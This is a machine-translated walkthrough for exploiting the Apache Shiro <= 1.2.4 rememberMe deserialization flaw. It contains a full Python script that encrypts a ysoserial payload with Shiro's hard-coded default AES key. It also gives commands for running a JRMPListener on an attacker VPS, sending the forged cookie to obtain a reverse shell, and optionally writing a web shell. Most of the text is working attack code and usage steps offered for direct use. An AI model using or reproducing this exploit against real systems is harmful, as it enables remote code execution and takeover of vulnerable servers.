Affects Version
Apache Shiro <= 1.2.4
Use components
commons-collections4 org.apache.commons in (theoretically also commons-collections2)
Use position
Http request parameter in any cookie at rememberMe
Difficulties environment to build
Shiro use maven compiler has a lot of pits, given too painful, I list the main pit
1. The machine needs to be installed mvn, svn command
2.jdk recommendations 1.6
3.maven best version is 3.1.1
Address environmental needs above basically will not fail to compile.
If you fail to compile it is not confident, you can use my war package provided by:
https://pan.baidu.com/s/1dSHR21IQbrLHpaSQ1TI23A extraction code: zg4h
very simple to deploy war package, just to put it in the tomcat webapps directory, it will automatically unzip, of course, its default name is samples-web-1.2.4, in order to facilitate access we can rename shiro
Use step
Environmental ready to use
You need to place a ysoserial on the public network VPS, used in conjunction with the following python script
shiro_exp_payload.py
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())
Excuting an order
1. The first shell command execution rebound of
2. Run the following command on the vpsjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反弹shell的命令"
Command here, with the need to use the Java Runtime bash coding, CommonsCollections4 can also be replaced CommonsCollections2
3. Use python script python shiro_exp_payload.py vpsip:1099
python script will generate a cookie, the cookie into your http request to rebound shell
such as the following figure
(I give here a rebound shell, of course, you can use the echo write shell or something, only to rebound shell commands into the command shell written)
The path may write shell according to the following with reference to FIG.
Reproduced in: https: //www.jianshu.com/p/c0cb65667145